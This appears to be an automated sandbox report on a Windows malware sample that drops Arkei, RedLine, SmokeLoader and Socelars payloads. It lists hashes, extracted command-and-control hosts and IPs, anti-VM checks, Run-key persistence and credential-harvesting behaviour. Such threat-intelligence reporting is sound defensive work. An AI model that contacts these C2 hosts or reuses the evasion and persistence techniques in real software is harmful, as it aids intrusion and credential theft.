arkei | 022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66

Target

022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
Size

403KB
MD5

f957e397e71010885b67f2afe37d8161
SHA1

a8bf84b971b37ac6e7f66c5e5a7e971a7741401e
SHA256

022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66
SHA512

8b5e9cb926fafc295c403c1fce7aa883db3a327e58c3295e9a081a8937bed28e305cca08c2c7d98080818095ea99bb4047e10aa2f61e3e4d6d965aef6d16a4f6

Malware Config

Extracted

Family

socelars

http://www.hhgenice.top/

Extracted

Family

redline

tatreriash.xyz:80

Extracted

Family

redline

Botnet

udptest

193.56.146.64:65441

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://misha.at/upload/

http://roohaniinfra.com/upload/

http://0axqpcc.cn/upload/

http://mayak-lombard.ru/upload/

http://mebel-lass.ru/upload/

http://dishakhan.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

1011h

charirelay.xyz:80

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei
Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5296	4804	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	9028	4804	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2584-252-0x00000000023B0000-0x00000000023DE000-memory.dmp	family_redline
behavioral2/memory/2584-262-0x0000000002570000-0x000000000259C000-memory.dmp	family_redline
behavioral2/memory/2084-265-0x0000000004360000-0x0000000004380000-memory.dmp	family_redline
behavioral2/memory/2084-287-0x000000000437A17E-mapping.dmp	family_redline
behavioral2/memory/3808-289-0x0000000000418EE6-mapping.dmp	family_redline
behavioral2/memory/3808-267-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\41becZN7ykRlarMfiT6VFJPv.exe	family_socelars
C:\Users\Admin\Pictures\Adobe Films\41becZN7ykRlarMfiT6VFJPv.exe	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description	pid	process	target process
PID 4332 created 2868	4332	WerFault.exe	HfZjSeknn_8lFvezoCMym7zK.exe
PID 4384 created 3376	4384	WerFault.exe	qB8q_Bi7Uq7GFXiNBPr2ALI7.exe

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Arkei Stealer Payload 1 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/2160-237-0x0000000000400000-0x0000000000444000-memory.dmp	family_arkei

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Downloads MZ/PE file

Executes dropped EXE 34 IoCs

Processes:

jMTLm46gEJIfRpgxDblLRf9F.exeaj6h9aq1Oy5A1p172nfop_1z.exe8UTMdc0sSC5dJMqI0wrs9Vi8.exeTFXogshPNMVhCKvZ1M6QDjTe.exeHfZjSeknn_8lFvezoCMym7zK.exeh2piw7SHAk2FUXox90o31iv6.exe41becZN7ykRlarMfiT6VFJPv.exevK6SvNBi5D74H1espDbLP_hA.exe15XMBCpxyCxaNEXBZDkFGzMI.exeC7iwCsv5B0lN4dC1j3Lr_uKB.exePhqrYJQomviCIRSWpyIt8dQZ.exewOvwOyyvUhmeksjM_VgC2z6f.exeWKhvgPrvsjyiK6AwjSSvsOXl.exeJ7qI7Fchr642VhuD0Cf3cCaR.exe9lKjDj4o_xSeel9jjoioM5mK.exezPgTLoLvPXkHhmuGNwWdg70B.exea5aD5wxjRmB9sJpSc45mwwb5.exeqB8q_Bi7Uq7GFXiNBPr2ALI7.exeiEWrDMBAOeVw6Rt4sYhbIKp2.exe_ZyQ8z7rdOsPsjcNNyxkGs7r.exe8L3PF0_KBJdEapAt_uAiTF2G.exefrMqzgLn3vlWWH7PNbBw0x3X.exe7HFzrcJoEBB24QyPIcBKPNeX.exevK6SvNBi5D74H1espDbLP_hA.executm3.exe7017028.exe4389992.exe8341662.exesvchost.exe8380704.exeWinHoster.exe616927.exe7479397.exe7606789.exe

pid	process
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1848	aj6h9aq1Oy5A1p172nfop_1z.exe
2584	8UTMdc0sSC5dJMqI0wrs9Vi8.exe
1092	TFXogshPNMVhCKvZ1M6QDjTe.exe
2868	HfZjSeknn_8lFvezoCMym7zK.exe
2884	h2piw7SHAk2FUXox90o31iv6.exe
2832	41becZN7ykRlarMfiT6VFJPv.exe
60	vK6SvNBi5D74H1espDbLP_hA.exe
1032	15XMBCpxyCxaNEXBZDkFGzMI.exe
368	C7iwCsv5B0lN4dC1j3Lr_uKB.exe
688	PhqrYJQomviCIRSWpyIt8dQZ.exe
1588	wOvwOyyvUhmeksjM_VgC2z6f.exe
1116	WKhvgPrvsjyiK6AwjSSvsOXl.exe
3908	J7qI7Fchr642VhuD0Cf3cCaR.exe
1708	9lKjDj4o_xSeel9jjoioM5mK.exe
4008	zPgTLoLvPXkHhmuGNwWdg70B.exe
2160	a5aD5wxjRmB9sJpSc45mwwb5.exe
3376	qB8q_Bi7Uq7GFXiNBPr2ALI7.exe
2244	iEWrDMBAOeVw6Rt4sYhbIKp2.exe
1232	_ZyQ8z7rdOsPsjcNNyxkGs7r.exe
3292	8L3PF0_KBJdEapAt_uAiTF2G.exe
1712	frMqzgLn3vlWWH7PNbBw0x3X.exe
2512	7HFzrcJoEBB24QyPIcBKPNeX.exe
1660	vK6SvNBi5D74H1espDbLP_hA.exe
3612	cutm3.exe
4300	7017028.exe
4368	4389992.exe
4912	8341662.exe
4960	svchost.exe
4316	8380704.exe
4672	WinHoster.exe
4976	616927.exe
3524	7479397.exe
4132	7606789.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

VMProtect packed file 5 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\zPgTLoLvPXkHhmuGNwWdg70B.exe	vmprotect
C:\Users\Admin\Pictures\Adobe Films\zPgTLoLvPXkHhmuGNwWdg70B.exe	vmprotect
C:\Windows\System\svchost.exe	vmprotect
C:\Windows\System\svchost.exe	vmprotect
behavioral2/memory/4008-222-0x0000000140000000-0x0000000140FFB000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

HfZjSeknn_8lFvezoCMym7zK.exeiEWrDMBAOeVw6Rt4sYhbIKp2.exe9lKjDj4o_xSeel9jjoioM5mK.exePhqrYJQomviCIRSWpyIt8dQZ.exe8380704.exe616927.exeqB8q_Bi7Uq7GFXiNBPr2ALI7.exe_ZyQ8z7rdOsPsjcNNyxkGs7r.exe8341662.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	HfZjSeknn_8lFvezoCMym7zK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	iEWrDMBAOeVw6Rt4sYhbIKp2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9lKjDj4o_xSeel9jjoioM5mK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	PhqrYJQomviCIRSWpyIt8dQZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8380704.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	616927.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	HfZjSeknn_8lFvezoCMym7zK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	qB8q_Bi7Uq7GFXiNBPr2ALI7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	_ZyQ8z7rdOsPsjcNNyxkGs7r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	_ZyQ8z7rdOsPsjcNNyxkGs7r.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	iEWrDMBAOeVw6Rt4sYhbIKp2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9lKjDj4o_xSeel9jjoioM5mK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8341662.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8380704.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	qB8q_Bi7Uq7GFXiNBPr2ALI7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	616927.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8341662.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	PhqrYJQomviCIRSWpyIt8dQZ.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe

Loads dropped DLL 8 IoCs

Processes:

7HFzrcJoEBB24QyPIcBKPNeX.exe

pid	process
2512	7HFzrcJoEBB24QyPIcBKPNeX.exe
2512	7HFzrcJoEBB24QyPIcBKPNeX.exe
2512	7HFzrcJoEBB24QyPIcBKPNeX.exe
2512	7HFzrcJoEBB24QyPIcBKPNeX.exe
2512	7HFzrcJoEBB24QyPIcBKPNeX.exe
2512	7HFzrcJoEBB24QyPIcBKPNeX.exe
2512	7HFzrcJoEBB24QyPIcBKPNeX.exe
2160

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 11 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\PhqrYJQomviCIRSWpyIt8dQZ.exe	themida
C:\Users\Admin\Pictures\Adobe Films\9lKjDj4o_xSeel9jjoioM5mK.exe	themida
C:\Users\Admin\Pictures\Adobe Films\iEWrDMBAOeVw6Rt4sYhbIKp2.exe	themida
C:\Users\Admin\Pictures\Adobe Films\_ZyQ8z7rdOsPsjcNNyxkGs7r.exe	themida
behavioral2/memory/2244-215-0x0000000001070000-0x0000000001071000-memory.dmp	themida
behavioral2/memory/1232-209-0x0000000000F80000-0x0000000000F81000-memory.dmp	themida
C:\Users\Admin\AppData\Roaming\8341662.exe	themida
C:\Users\Admin\AppData\Roaming\8380704.exe	themida
C:\Users\Admin\AppData\Roaming\616927.exe	themida
behavioral2/memory/1708-243-0x0000000000F90000-0x0000000000F91000-memory.dmp	themida
behavioral2/memory/688-220-0x00000000013A0000-0x00000000013A1000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

4389992.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	4389992.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 9 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

qB8q_Bi7Uq7GFXiNBPr2ALI7.exe9lKjDj4o_xSeel9jjoioM5mK.exePhqrYJQomviCIRSWpyIt8dQZ.exe8341662.exeHfZjSeknn_8lFvezoCMym7zK.exe_ZyQ8z7rdOsPsjcNNyxkGs7r.exeiEWrDMBAOeVw6Rt4sYhbIKp2.exe8380704.exe616927.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	qB8q_Bi7Uq7GFXiNBPr2ALI7.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9lKjDj4o_xSeel9jjoioM5mK.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	PhqrYJQomviCIRSWpyIt8dQZ.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8341662.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	HfZjSeknn_8lFvezoCMym7zK.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	_ZyQ8z7rdOsPsjcNNyxkGs7r.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	iEWrDMBAOeVw6Rt4sYhbIKp2.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8380704.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	616927.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

149 ipinfo.io
150 ipinfo.io
163 ip-api.com
224 ipinfo.io
225 ipinfo.io
387 ip-api.com
19 ipinfo.io
21 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
149	ipinfo.io
150	ipinfo.io
163	ip-api.com
224	ipinfo.io
225	ipinfo.io
387	ip-api.com
19	ipinfo.io
21	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs

Processes:

9lKjDj4o_xSeel9jjoioM5mK.exe_ZyQ8z7rdOsPsjcNNyxkGs7r.exeiEWrDMBAOeVw6Rt4sYhbIKp2.exePhqrYJQomviCIRSWpyIt8dQZ.exe8341662.exe8380704.exe616927.exe

pid	process
1708	9lKjDj4o_xSeel9jjoioM5mK.exe
1232	_ZyQ8z7rdOsPsjcNNyxkGs7r.exe
2244	iEWrDMBAOeVw6Rt4sYhbIKp2.exe
688	PhqrYJQomviCIRSWpyIt8dQZ.exe
4912	8341662.exe
4316	8380704.exe
4976	616927.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

vK6SvNBi5D74H1espDbLP_hA.exeHfZjSeknn_8lFvezoCMym7zK.exeqB8q_Bi7Uq7GFXiNBPr2ALI7.exe

description	pid	process	target process
PID 60 set thread context of 1660	60	vK6SvNBi5D74H1espDbLP_hA.exe	vK6SvNBi5D74H1espDbLP_hA.exe
PID 2868 set thread context of 2084	2868	HfZjSeknn_8lFvezoCMym7zK.exe	AppLaunch.exe
PID 3376 set thread context of 3808	3376	qB8q_Bi7Uq7GFXiNBPr2ALI7.exe	AppLaunch.exe

Drops file in Program Files directory 6 IoCs

Processes:

h2piw7SHAk2FUXox90o31iv6.exeWKhvgPrvsjyiK6AwjSSvsOXl.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	h2piw7SHAk2FUXox90o31iv6.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	h2piw7SHAk2FUXox90o31iv6.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	WKhvgPrvsjyiK6AwjSSvsOXl.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe	WKhvgPrvsjyiK6AwjSSvsOXl.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	WKhvgPrvsjyiK6AwjSSvsOXl.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	WKhvgPrvsjyiK6AwjSSvsOXl.exe

Drops file in Windows directory 4 IoCs

Processes:

zPgTLoLvPXkHhmuGNwWdg70B.exesvchost.exe

description	ioc	process
File created	C:\Windows\System\xxx1.bak	zPgTLoLvPXkHhmuGNwWdg70B.exe
File created	C:\Windows\System\svchost.exe	zPgTLoLvPXkHhmuGNwWdg70B.exe
File opened for modification	C:\Windows\System\svchost.exe	zPgTLoLvPXkHhmuGNwWdg70B.exe
File created	C:\Windows\System\xxx1.bak	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 9 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
5088	368	WerFault.exe	C7iwCsv5B0lN4dC1j3Lr_uKB.exe
4440	368	WerFault.exe	C7iwCsv5B0lN4dC1j3Lr_uKB.exe
5472	1588	WerFault.exe	wOvwOyyvUhmeksjM_VgC2z6f.exe
4896	368	WerFault.exe	C7iwCsv5B0lN4dC1j3Lr_uKB.exe
5788	368	WerFault.exe	C7iwCsv5B0lN4dC1j3Lr_uKB.exe
4384	3376	WerFault.exe	qB8q_Bi7Uq7GFXiNBPr2ALI7.exe
4332	2868	WerFault.exe	HfZjSeknn_8lFvezoCMym7zK.exe
2976	368	WerFault.exe	C7iwCsv5B0lN4dC1j3Lr_uKB.exe
6028	368	WerFault.exe	C7iwCsv5B0lN4dC1j3Lr_uKB.exe

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\7HFzrcJoEBB24QyPIcBKPNeX.exe	nsis_installer_1
C:\Users\Admin\Pictures\Adobe Films\7HFzrcJoEBB24QyPIcBKPNeX.exe	nsis_installer_2
C:\Users\Admin\Pictures\Adobe Films\7HFzrcJoEBB24QyPIcBKPNeX.exe	nsis_installer_1
C:\Users\Admin\Pictures\Adobe Films\7HFzrcJoEBB24QyPIcBKPNeX.exe	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

TFXogshPNMVhCKvZ1M6QDjTe.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	TFXogshPNMVhCKvZ1M6QDjTe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	TFXogshPNMVhCKvZ1M6QDjTe.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	TFXogshPNMVhCKvZ1M6QDjTe.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

2704 schtasks.exe
4280 schtasks.exe
4800 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5664 timeout.exe
Download via BitsAdmin 1 TTPs 1 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exe

pid process

5220 bitsadmin.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

5932 taskkill.exe
4028 taskkill.exe
5968 taskkill.exe

pid	process
2704	schtasks.exe
4280	schtasks.exe
4800	schtasks.exe

pid	process
5664	timeout.exe

pid	process
5220	bitsadmin.exe

pid	process
5932	taskkill.exe
4028	taskkill.exe
5968	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exejMTLm46gEJIfRpgxDblLRf9F.exe

pid	process
3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
3036	022e3c30a1504fde93e24b2206f804a923ee9785e4db81a166939a1e7b928b66.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe
1280	jMTLm46gEJIfRpgxDblLRf9F.exe

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

TFXogshPNMVhCKvZ1M6QDjTe.exe

pid process

1092 TFXogshPNMVhCKvZ1M6QDjTe.exe

pid	process
1092	TFXogshPNMVhCKvZ1M6QDjTe.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

41becZN7ykRlarMfiT6VFJPv.exefrMqzgLn3vlWWH7PNbBw0x3X.exe8UTMdc0sSC5dJMqI0wrs9Vi8.exeWerFault.exeWerFault.exeWerFault.exeaj6h9aq1Oy5A1p172nfop_1z.exeWerFault.exepowershell.exeCalculator.exe

description	pid	process
Token: SeCreateTokenPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeAssignPrimaryTokenPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeLockMemoryPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeIncreaseQuotaPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeMachineAccountPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeTcbPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeSecurityPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeTakeOwnershipPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeLoadDriverPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeSystemProfilePrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeSystemtimePrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeProfSingleProcessPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeIncBasePriorityPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeCreatePagefilePrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeCreatePermanentPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeBackupPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeRestorePrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeShutdownPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeDebugPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeAuditPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeSystemEnvironmentPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeChangeNotifyPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeRemoteShutdownPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeUndockPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeSyncAgentPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeEnableDelegationPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeManageVolumePrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeImpersonatePrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeCreateGlobalPrivilege	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: 31	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: 32	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: 33	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: 34	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: 35	2832	41becZN7ykRlarMfiT6VFJPv.exe
Token: SeDebugPrivilege	1712	frMqzgLn3vlWWH7PNbBw0x3X.exe
Token: SeDebugPrivilege	2584	8UTMdc0sSC5dJMqI0wrs9Vi8.exe
Token: SeRestorePrivilege	2976	WerFault.exe
Token: SeBackupPrivilege	2976	WerFault.exe
Token: SeDebugPrivilege	2976	WerFault.exe
Token: SeDebugPrivilege	4332	WerFault.exe
Token: SeDebugPrivilege	4384	WerFault.exe
Token: SeDebugPrivilege	1848	aj6h9aq1Oy5A1p172nfop_1z.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeDebugPrivilege	4896	WerFault.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeDebugPrivilege	4352	powershell.exe
Token: SeDebugPrivilege	4548	Calculator.exe
Token: SeShutdownPrivilege	3024
Token: SeCreatePagefilePrivilege	3024
Token: SeShutdownPrivilege	3024
